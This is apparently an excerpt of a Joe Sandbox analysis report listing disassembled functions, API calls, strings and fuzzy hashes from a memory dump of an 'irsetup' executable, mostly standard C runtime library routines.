Opcode Fuzzy Hash: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
Instruction Fuzzy Hash: D6310E35302A4885FEEBEB659061BFC2351AF8DBC4F48D526F91A476C6CE54CB4C8316

Function 000000018003B0E8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003B110

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

__wtomb_environ.LIBCMT ref: 000000018003B209
_errno.LIBCMT ref: 000000018003B213
free.LIBCMT ref: 000000018003B305
SetEnvironmentVariableA.KERNEL32 ref: 000000018003B450
_errno.LIBCMT ref: 000000018003B45E
free.LIBCMT ref: 000000018003B46C
free.LIBCMT ref: 000000018003B479
free.LIBCMT ref: 000000018003B48B

Strings

COMSPEC, xrefs: 000000018003B0F2

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
String ID: COMSPEC
API String ID: 3451773520-1631433037
Opcode ID: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction ID: 4ba3cebf007e37312f75b89635b496495a772fde7ddc12decf222640a794de8d
Opcode Fuzzy Hash: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
Instruction Fuzzy Hash: 4EA1B036601A9C81FAE3AB15A9003EF6391F7887DCF56C615BB5A87785CF38879D8300

Function 0000000180036A98 Relevance: 15.3, APIs: 10, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000180036BBF

Part of subcall function 000000018002FB40: GetLastError.KERNEL32 ref: 000000018002FBA9
Part of subcall function 000000018002FB40: free.LIBCMT ref: 000000018002FC35

free.LIBCMT ref: 0000000180036D88
free.LIBCMT ref: 0000000180036D98
free.LIBCMT ref: 0000000180036DA8
free.LIBCMT ref: 0000000180036DB4
free.LIBCMT ref: 0000000180036E09
free.LIBCMT ref: 0000000180036E11
free.LIBCMT ref: 0000000180036E19
free.LIBCMT ref: 0000000180036E21
free.LIBCMT ref: 0000000180036E2B

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction ID: 0cfcddc6f49efeab6f4f61afc9e86eb49e25840f6bfa506a9695891ebaf45d4b
Opcode Fuzzy Hash: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
Instruction Fuzzy Hash: 27B19F32604AD486DBA2CF25E4503EEB7A4F748B84F95C126FB99877A5DF38C649C700

Function 000000018003D45C Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D576
malloc.LIBCMT ref: 000000018003D58D
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D64C
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D68C
free.LIBCMT ref: 000000018003D69A
free.LIBCMT ref: 000000018003D6BC

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$Infofree$malloc
String ID:
API String ID: 1309074677-0
Opcode ID: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction ID: ef16a251ce0a63a525c3aa4d0bbb8d493572552397f9166123f23fc75798a009
Opcode Fuzzy Hash: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
Instruction Fuzzy Hash: DA61E432204B8886E7A39F25B4403EB77D5F7897E8F158626FA5A43BD4DF38C6498700

Function 0000000180038D00 Relevance: 15.1, APIs: 10, Instructions: 121COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D2F
GetLastError.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D49
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038D6F
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038DC4
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E00
free.LIBCMT ref: 0000000180038E0E
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E19
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E31
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E72
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,000000018003CEE0), ref: 0000000180038E8E

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
String ID:
API String ID: 994105223-0
Opcode ID: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction ID: d9ef7338b76749b8665854ab0faee35fb482f0185a0d43e1efd96c80377bbde6
Opcode Fuzzy Hash: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
Instruction Fuzzy Hash: 3E41C33260475C82EAE7AF12A9443AB7791BB5CBC0F1AC454FA4707BA9CF78D658D300

Function 0000000180003220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EF10

_wfreopen.LIBCMT ref: 00000001800032D3

Part of subcall function 000000018001EEF0: _errno.LIBCMT ref: 000000018001EFBA

_errno.LIBCMT ref: 00000001800033C2

Strings

open, xrefs: 0000000180003328
@%s, xrefs: 00000001800032F9
=stdin, xrefs: 0000000180003262
cannot %s %s: %s, xrefs: 00000001800033E5
reopen, xrefs: 00000001800032E2
read, xrefs: 00000001800033DE

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_wfreopen
String ID: =stdin$@%s$cannot %s %s: %s$open$read$reopen
API String ID: 1073068216-1171916245
Opcode ID: 85cd4c32182d132d2ed86845f1803cd7cc927c8458ce75903d91d74d90aa5753
Instruction ID: 1853566ffd4394b5b462cd73b286757f755f6c0d306ff0bd9e01786340f21f8e
Opcode Fuzzy Hash: 85cd4c32182d132d2ed86845f1803cd7cc927c8458ce75903d91d74d90aa5753
Instruction Fuzzy Hash: 8051B731214A8881FEE7EB66A5813EE7795AB8E7C0F44D112FA4A47796DF38C34D8740

Function 0000000180037A04 Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A64
GetLastError.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A76
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037AD6
malloc.LIBCMT ref: 0000000180037B42
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037B8C
GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037BA3
free.LIBCMT ref: 0000000180037BB4
GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037C31
free.LIBCMT ref: 0000000180037C41

Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
Part of subcall function 000000018003D45C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
Part of subcall function 000000018003D45C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
String ID:
API String ID: 3804003340-0
Opcode ID: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction ID: b72f06588925f2ba8d140ce4529a3e9eb07fecfdf33ec2bb692ee0be162e1f54
Opcode Fuzzy Hash: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
Instruction Fuzzy Hash: 1F618232300A888AE7B39F25E4407DAA7A2F74CBE8F158615FA1D53BD5DF74CA498740

Function 000000018002097C Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00000001800209A5
DecodePointer.KERNEL32 ref: 00000001800209D8
DecodePointer.KERNEL32 ref: 00000001800209F5
DecodePointer.KERNEL32 ref: 0000000180020A34
DecodePointer.KERNEL32 ref: 0000000180020A4D
DecodePointer.KERNEL32 ref: 0000000180020A5C
_initterm.LIBCMT ref: 0000000180020A9B
_initterm.LIBCMT ref: 0000000180020AAE
ExitProcess.KERNEL32 ref: 0000000180020AE7

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer$_initterm$ExitProcess_lock
String ID:
API String ID: 2551688548-0
Opcode ID: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction ID: 0925ad66611745c8ce2a8e9b3f352f1836afede7ec58ebd276bd38845fb38505
Opcode Fuzzy Hash: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
Instruction Fuzzy Hash: D1416D31212B4885EAE3DB11E8817DA63A4B78C7C4F64C025BA8D437A7EF78C65D8742

Function 0000000180032F64 Relevance: 13.6, APIs: 9, Instructions: 89COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032F8D
_errno.LIBCMT ref: 0000000180032F96
__doserrno.LIBCMT ref: 0000000180032FE5
_errno.LIBCMT ref: 0000000180032FEC

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction ID: a7b466250e8cbf9d99a39da3f19165df2e40a545f04f40789bff1e1118104bb7
Opcode Fuzzy Hash: f65c103c47602ed978b93713e1d3f39d8ad6cd9bee0c213a3201f4354ec7b13a
Instruction Fuzzy Hash: 0E31073261068841F797AF26A8827EE7751B7C97E0F56C616FA69077D2CE38C609C700

Function 0000000180039498 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001800394C1
_errno.LIBCMT ref: 00000001800394CA
__doserrno.LIBCMT ref: 000000018003951A
_errno.LIBCMT ref: 0000000180039521

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction ID: e70739f4f642107e89704e3f638af8b430b091e6b205e4125928beaead29ef60
Opcode Fuzzy Hash: f8ec99dead7eae27ea62b11ceaad04973049ee7c1eae35e6748e305a13c8aa8c
Instruction Fuzzy Hash: 1531F332611A8841E793AFA6A8417EE3651B7897F0F52C316FE3907BD6CE38C245C700

Function 0000000180032D98 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180032DC1
_errno.LIBCMT ref: 0000000180032DCA
__doserrno.LIBCMT ref: 0000000180032E19
_errno.LIBCMT ref: 0000000180032E20

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction ID: d9038f30b84bd084f134f145b4ea9161b6956bb9982c7eca4ea7920d869c151e
Opcode Fuzzy Hash: 95b2ddd99199fd082a776d34f6b70aadb35083853c36821b65bf49810995515d
Instruction Fuzzy Hash: 20310432610A9841E793AF26A8427EE3651B789BE0F52C616BE650B7D2CF38C6098700

Function 000000018002C68C Relevance: 12.1, APIs: 8, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002C6AB
_errno.LIBCMT ref: 000000018002C6B4
__doserrno.LIBCMT ref: 000000018002C704
_errno.LIBCMT ref: 000000018002C70B

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction ID: ec033c54c6d7d521fc6e23a01929881988fa191f7bf2fc9d76832262eb4df226
Opcode Fuzzy Hash: 12e7cb3513a0e49729136e79be1dd76601074c661b2d8eba89108e0172cd2a53
Instruction Fuzzy Hash: 5131E132614ADC41E7A3AF35A841BAE3751B7897E0F65C616FA25077D2CF38C6088B02

Function 00000001800305E8 Relevance: 12.0, APIs: 8, Instructions: 50synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030612
GetExitCodeProcess.KERNEL32 ref: 0000000180030624
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030633
_errno.LIBCMT ref: 000000018003063E
__doserrno.LIBCMT ref: 0000000180030649
GetLastError.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 0000000180030656
CloseHandle.KERNEL32(?,?,00000000,0000000180021467,?,?,?,?,?,000000018000D25E), ref: 000000018003066A
_errno.LIBCMT ref: 000000018003067D

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLast_errno$CloseCodeExitHandleObjectProcessSingleWait__doserrno
String ID:
API String ID: 280878599-0
Opcode ID: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction ID: 68bd96f5714e3ffe11f7f818daa76e97712db3409049de95b658a461dfe5d033
Opcode Fuzzy Hash: 0ccb78650a003e7551a91411930094d31d7370eb04be051faf4de01c01ecae4e
Instruction Fuzzy Hash: 1511003060168882EBE35FA5A5503BE2760A78DBF0F26C310F976037E9CE38C659CB01

Function 000000018002C830 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 000000018002C855

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

GetFileType.KERNEL32 ref: 000000018002C9D2

Strings

@, xrefs: 000000018002CACD

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID: @
API String ID: 1527402494-2766056989
Opcode ID: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction ID: 230c68c653191f54178d303bf2b0e4d8cf0cc3789bfed5754acc8c55ed461bfd
Opcode Fuzzy Hash: 30a114b4c9d0744333bf9d0cdf09890f88df3db5d481d84467094c0a7cfeb7c0
Instruction Fuzzy Hash: 43916232214A8881E7A3CB29D448BA827A5F3097F8F65C715E679473E1DF79C94AC313

Function 000000018001FBE8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 000000018001FC28
_errno.LIBCMT ref: 000000018001FDE2

Strings

+, xrefs: 000000018001FCC5
-, xrefs: 000000018001FCBA
0, xrefs: 000000018001FCF3
0, xrefs: 000000018001FD21

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: +$-$0$0
API String ID: 3432092939-699404926
Opcode ID: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction ID: cdf1d1b669f77c7e48de24e0b0f5a27944c92b146814c4b507a9b0648c28b355
Opcode Fuzzy Hash: aef4c626dfe16162097ea91d7ccfcab36eb38782483d1e4cde3ef44bddeab12c
Instruction Fuzzy Hash: 2B71D332904E8C81F7F78A25E4553FA26D2B7897D4F29C116FF56023D1DF68CA498342

Function 000000018000DA70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180021DF4: _errno.LIBCMT ref: 0000000180021D4F

_errno.LIBCMT ref: 000000018000DAC6

Part of subcall function 000000018000D9B0: _fread_nolock.LIBCMT ref: 000000018000DA0F

Strings

%lf, xrefs: 000000018000DBC3
invalid format, xrefs: 000000018000DC1E
invalid option, xrefs: 000000018000DB9E
too many arguments, xrefs: 000000018000DB08

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_fread_nolock
String ID: %lf$invalid format$invalid option$too many arguments
API String ID: 1771911937-3304058045
Opcode ID: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction ID: 4ecbb218ed77667f7209945df211a99de47e7cbe1f5077c6477dde9f3f5f1065
Opcode Fuzzy Hash: dd889c9f9525e5531aa04821184b90127f112d79a6aca0c645ec3948b7535793
Instruction Fuzzy Hash: 9A51F13120464C86FAE7E62656517FE73416B8EBE0F85C112BD060B7C7DE28CB0E8391

Function 0000000180033098 Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800330B1
_errno.LIBCMT ref: 00000001800330FE

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction ID: 529fb29261052428e6b08158eb4e60c077481b13b416dc635a86f518e286f846
Opcode Fuzzy Hash: 10b8268bd5c2834551bc20e91e9decf35da7137d4514d6a36ee00c524129727a
Instruction Fuzzy Hash: 1931F631B10A8C45F7A7AF79A8963EF2751A7897D0F16C61DBA25073D2CF788608C704

Function 00000001800213B4 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800213D7

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno
String ID:
API String ID: 3485708101-0
